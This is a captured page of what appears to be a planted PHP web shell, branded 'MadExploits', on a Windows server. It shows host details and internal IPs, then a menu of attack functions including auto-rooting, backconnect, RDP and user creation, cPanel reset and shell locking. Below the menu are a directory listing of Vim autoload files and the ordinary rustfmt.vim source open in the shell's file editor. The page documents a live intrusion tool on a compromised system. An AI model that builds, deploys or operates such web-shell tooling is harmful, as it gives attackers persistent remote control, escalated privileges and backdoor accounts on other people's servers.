Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
laragon /
bin /
git /
usr /
share /
vim /
vim82 /
autoload /
[ HOME SHELL ]
Name
Size
Permission
Action
dist
[ DIR ]
drwxrwxrwx
xml
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-rw-rw-
README.txt
773
B
-rw-rw-rw-
RstFold.vim
1.86
KB
-rw-rw-rw-
ada.vim
22.04
KB
-rw-rw-rw-
adacomplete.vim
3.58
KB
-rw-rw-rw-
ccomplete.vim
19.32
KB
-rw-rw-rw-
clojurecomplete.vim
8.66
KB
-rw-rw-rw-
context.vim
5.33
KB
-rw-rw-rw-
contextcomplete.vim
656
B
-rw-rw-rw-
csscomplete.vim
42.24
KB
-rw-rw-rw-
decada.vim
2.93
KB
-rw-rw-rw-
freebasic.vim
1.12
KB
-rw-rw-rw-
getscript.vim
24.29
KB
-rw-rw-rw-
gnat.vim
5.21
KB
-rw-rw-rw-
gzip.vim
6.26
KB
-rw-rw-rw-
haskellcomplete.vim
103.31
KB
-rw-rw-rw-
htmlcomplete.vim
24.88
KB
-rw-rw-rw-
javascriptcomplete.vim
27.48
KB
-rw-rw-rw-
netrw.vim
549.6
KB
-rw-rw-rw-
netrwFileHandlers.vim
9.89
KB
-rw-rw-rw-
netrwSettings.vim
10.23
KB
-rw-rw-rw-
netrw_gitignore.vim
1.21
KB
-rw-rw-rw-
paste.vim
672
B
-rw-rw-rw-
phpcomplete.vim
346.21
KB
-rw-rw-rw-
python3complete.vim
21.16
KB
-rw-rw-rw-
pythoncomplete.vim
21.59
KB
-rw-rw-rw-
rubycomplete.vim
25.26
KB
-rw-rw-rw-
rust.vim
10.22
KB
-rw-rw-rw-
rustfmt.vim
2.92
KB
-rw-rw-rw-
spellfile.vim
5.96
KB
-rw-rw-rw-
sqlcomplete.vim
38.27
KB
-rw-rw-rw-
syntaxcomplete.vim
32.86
KB
-rw-rw-rw-
tar.vim
29.62
KB
-rw-rw-rw-
tohtml.vim
30.9
KB
-rw-rw-rw-
vimball.vim
23.76
KB
-rw-rw-rw-
xmlcomplete.vim
14.59
KB
-rw-rw-rw-
xmlformat.vim
6.05
KB
-rw-rw-rw-
zip.vim
14.69
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : rustfmt.vim
" Author: Stephen Sugden <stephen@stephensugden.com> " " Adapted from https://github.com/fatih/vim-go " For bugs, patches and license go to https://github.com/rust-lang/rust.vim if !exists("g:rustfmt_autosave") let g:rustfmt_autosave = 0 endif if !exists("g:rustfmt_command") let g:rustfmt_command = "rustfmt" endif if !exists("g:rustfmt_options") let g:rustfmt_options = "" endif if !exists("g:rustfmt_fail_silently") let g:rustfmt_fail_silently = 0 endif let s:got_fmt_error = 0 function! s:RustfmtCommandRange(filename, line1, line2) let l:arg = {"file": shellescape(a:filename), "range": [a:line1, a:line2]} return printf("%s %s --write-mode=overwrite --file-lines '[%s]'", g:rustfmt_command, g:rustfmt_options, json_encode(l:arg)) endfunction function! s:RustfmtCommand(filename) return g:rustfmt_command . " --write-mode=overwrite " . g:rustfmt_options . " " . shellescape(a:filename) endfunction function! s:RunRustfmt(command, curw, tmpname) if exists("*systemlist") let out = systemlist(a:command) else let out = split(system(a:command), '\r\?\n') endif if v:shell_error == 0 || v:shell_error == 3 " remove undo point caused via BufWritePre try | silent undojoin | catch | endtry " Replace current file with temp file, then reload buffer call rename(a:tmpname, expand('%')) silent edit! let &syntax = &syntax " only clear location list if it was previously filled to prevent " clobbering other additions if s:got_fmt_error let s:got_fmt_error = 0 call setloclist(0, []) lwindow endif elseif g:rustfmt_fail_silently == 0 " otherwise get the errors and put them in the location list let errors = [] for line in out " src/lib.rs:13:5: 13:10 error: expected `,`, or `}`, found `value` let tokens = matchlist(line, '^\(.\{-}\):\(\d\+\):\(\d\+\):\s*\(\d\+:\d\+\s*\)\?\s*error: \(.*\)') if !empty(tokens) call add(errors, {"filename": @%, \"lnum": tokens[2], \"col": tokens[3], \"text": tokens[5]}) endif endfor if empty(errors) % | " Couldn't detect rustfmt error format, output errors endif if !empty(errors) call setloclist(0, errors, 'r') echohl Error | echomsg "rustfmt returned error" | echohl None endif let s:got_fmt_error = 1 lwindow " We didn't use the temp file, so clean up call delete(a:tmpname) endif call winrestview(a:curw) endfunction function! rustfmt#FormatRange(line1, line2) let l:curw = winsaveview() let l:tmpname = expand("%:p:h") . "/." . expand("%:p:t") . ".rustfmt" call writefile(getline(1, '$'), l:tmpname) let command = s:RustfmtCommandRange(l:tmpname, a:line1, a:line2) call s:RunRustfmt(command, l:curw, l:tmpname) endfunction function! rustfmt#Format() let l:curw = winsaveview() let l:tmpname = expand("%:p:h") . "/." . expand("%:p:t") . ".rustfmt" call writefile(getline(1, '$'), l:tmpname) let command = s:RustfmtCommand(l:tmpname) call s:RunRustfmt(command, l:curw, l:tmpname) endfunction
Close